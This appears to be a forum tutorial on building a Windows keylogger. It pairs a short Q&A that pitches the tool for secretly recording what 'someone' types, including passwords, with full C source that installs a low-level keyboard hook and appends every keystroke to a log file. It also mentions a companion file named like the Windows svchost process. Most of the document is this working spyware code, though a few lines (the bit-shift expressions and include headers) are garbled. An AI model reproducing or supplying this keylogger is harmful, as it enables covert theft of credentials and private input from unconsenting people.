it's a program that logs everything that you type on the keyboard.
what are it's usages to me?
well, if you want to record everytyhing someone types then you can then see anything you want like passwords and such.
how do i get one?
you can buy some corperate or home usage ones that are made for recording what employees are doing or what your kids are doing. that is a bad method though since they are bloated, cost money since most people don't know how to find warez and it's better to make your own since you can make it do what you want to do.
ok, how do i do this?
you program one. if your new to programming then learn how to program in c then come back here. if you know how to program in c then read on.
there are two ways of making a keylogger:
1. using the GetAsyncKeyState API. look at svchost.c.
2. Using the SetWindowsHookEx API. This is the prefered method but only works on NT based systems. The reason this way is prefered is because it is much more efficient that GetAsyncKeyState. See for yourself. No need to check if what character is being pressed and no need to check other stuff like the value -32767 is being returned. Look here about this. When you use the SetWindowsHookApi you "hook" the keyboard to that you can send all of the keys prssed to somewhere. When making a keylogger you usually send it to a file so that all of the keys will be logged there. The only disavantage of using this API if you could even call it a disadvantage is that you have to use have a DLL as well as your .exe file. I found a peice of code that doesn't need a DLL. Here it is with a slight modification from me so that you don't have to have the keylogger close before you can view the file with the logged keys in it:
CODE C Language
001 | // This code will only work if you have Windows NT or |
002 | // any later version installed, 2k and XP will work. |
003 |
004 |
005 | #define _WIN32_WINNT 0x0400 |
006 |
007 | #include |
008 | #include |
009 | #include |
010 |
011 | // Global Hook handle |
012 | HHOOK hKeyHook; |
013 |
014 |
015 | |
016 | // This is the function that is "exported" from the |
017 | // execuatable like any function is exported from a |
018 | // DLL. It is the hook handler routine for low level |
019 | // keyboard events. |
020 |
021 | __declspec ( dllexport ) LRESULT CALLBACK KeyEvent ( |
022 |
023 | int nCode, // The hook code |
024 | WPARAM wParam, // The window message (WM_KEYUP, WM_KEYDOWN, etc.) |
025 | LPARAM lParam // A pointer to a struct with information about the pressed key |
026 |
027 | ) { |
028 | if ((nCode == HC_ACTION) && // HC_ACTION means we may process this event |
029 | ((wParam == WM_SYSKEYDOWN) || // Only react if either a system key ... |
030 | (wParam == WM_KEYDOWN))) // ... or a normal key have been pressed. |
031 | { |
032 |
033 | // This struct contains various information about |
034 | // the pressed key such as hardware scan code, virtual |
035 | // key code and further flags. |
036 |
037 | KBDLLHOOKSTRUCT hooked = |
038 | *((KBDLLHOOKSTRUCT*)lParam); |
039 |
040 | |
041 | // dwMsg shall contain the information that would be stored |
042 | // in the usual lParam argument of a WM_KEYDOWN message. |
043 | // All information like hardware scan code and other flags |
044 | // are stored within one double word at different bit offsets. |
045 | // Refer to MSDN for further information: |
046 | // |
048 | // windowsuserinterface/userinput/keyboardinput/aboutkeyboardinput.asp |
049 | // |
050 | // (Keystroke Messages) |
051 |
052 |
053 | DWORD dwMsg = 1; |
054 | dwMsg += hooked.scanCode <<> |
055 | dwMsg += hooked.flags <<> |
056 |
057 |
058 | // Call the GetKeyNameText() function to get the language-dependant |
059 | // name of the pressed key. This function should return the name |
060 | // of the pressed key in your language, aka the language used on |
061 | // the system. |
062 |
063 | char lpszName[0x100] = {0}; |
064 | lpszName[0] = '[' ; |
065 |
066 | int i = GetKeyNameText(dwMsg, |
067 | (lpszName+1),0xFF) + 1; |
068 |
069 | lpszName[i] = ']' ; |
070 |
071 |
072 | // Print this name to the standard console output device. |
073 |
074 | FILE *file; |
075 | file= fopen ( "keys.log" , "a+" ); |
076 | fputs (lpszName,file); |
077 | fflush (file); |
078 | } |
079 |
080 |
081 | // the return value of the CallNextHookEx routine is always |
082 | // returned by your HookProc routine. This allows other |
083 | // applications to install and handle the same hook as well. |
084 |
085 | return CallNextHookEx(hKeyHook, |
086 | nCode,wParam,lParam); |
087 |
088 | } |
089 |
090 | |
091 |
092 | // This is a simple message loop that will be used |
093 | // to block while we are logging keys. It does not |
094 | // perform any real task ... |
095 |
096 | void MsgLoop() |
097 | { |
098 | MSG message; |
099 | while (GetMessage(&message,NULL,0,0)) { |
100 | TranslateMessage( &message ); |
101 | DispatchMessage( &message ); |
102 | } |
103 | } |
104 |
105 |
106 | // This thread is started by the main routine to install |
107 | // the low level keyboard hook and start the message loop |
108 | // to loop forever while waiting for keyboard events. |
109 |
110 | DWORD WINAPI KeyLogger( LPVOID lpParameter) |
111 | { |
112 |
113 | // Get a module handle to our own executable. Usually, |
114 | // the return value of GetModuleHandle(NULL) should be |
115 | // a valid handle to the current application instance, |
116 | // but if it fails we will also try to actually load |
117 | // ourself as a library. The thread's parameter is the |
118 | // first command line argument which is the path to our |
119 | // executable. |
120 |
121 | HINSTANCE hExe = GetModuleHandle(NULL); |
122 | if (!hExe) hExe = LoadLibrary(( LPCSTR ) lpParameter); |
123 |
124 | // Everything failed, we can't install the hook ... this |
125 | // never happened, but error handling is important. |
126 |
127 | if (!hExe) return 1; |
128 |
129 |
130 |
131 | hKeyHook = SetWindowsHookEx ( // install the hook: |
132 |
133 | WH_KEYBOARD_LL, // as a low level keyboard hook |
134 | (HOOKPROC) KeyEvent, // with the KeyEvent function from this executable |
135 | hExe, // and the module handle to our own executable |
136 | NULL // and finally, the hook should monitor all threads. |
137 | ); |
138 |
139 |
140 | // Loop forever in a message loop and if the loop |
141 | // stops some time, unhook the hook. I could have |
142 | // added a signal handler for ctrl-c that unhooks |
143 | // the hook once the application is terminated by |
144 | // the user, but I was too lazy. |
145 |
146 | MsgLoop(); |
147 | UnhookWindowsHookEx(hKeyHook); |
148 | return 0; |
149 | } |
150 | |
151 |
152 | // The main function just starts the thread that |
153 | // installs the keyboard hook and waits until it |
154 | // terminates. |
155 |
156 | int main( int argc, char ** argv) |
157 | { |
158 | HANDLE hThread; |
159 | DWORD dwThread; |
160 | DWORD exThread; |
161 |
162 | hThread = CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE) |
163 | KeyLogger, ( LPVOID ) argv[0], NULL, &dwThread); |
164 |
165 | if (hThread) { |
166 | return WaitForSingleObject(hThread,INFINITE); |
167 | } else { |
168 | return 1; |
169 | } |
170 | } |
if anyone has any questions on this feel free to post them here.
enjoy.
svchost.txt (11.8K)
reflink: http://www.rohitab.com/discuss/index.php?showtopic=19360&st=20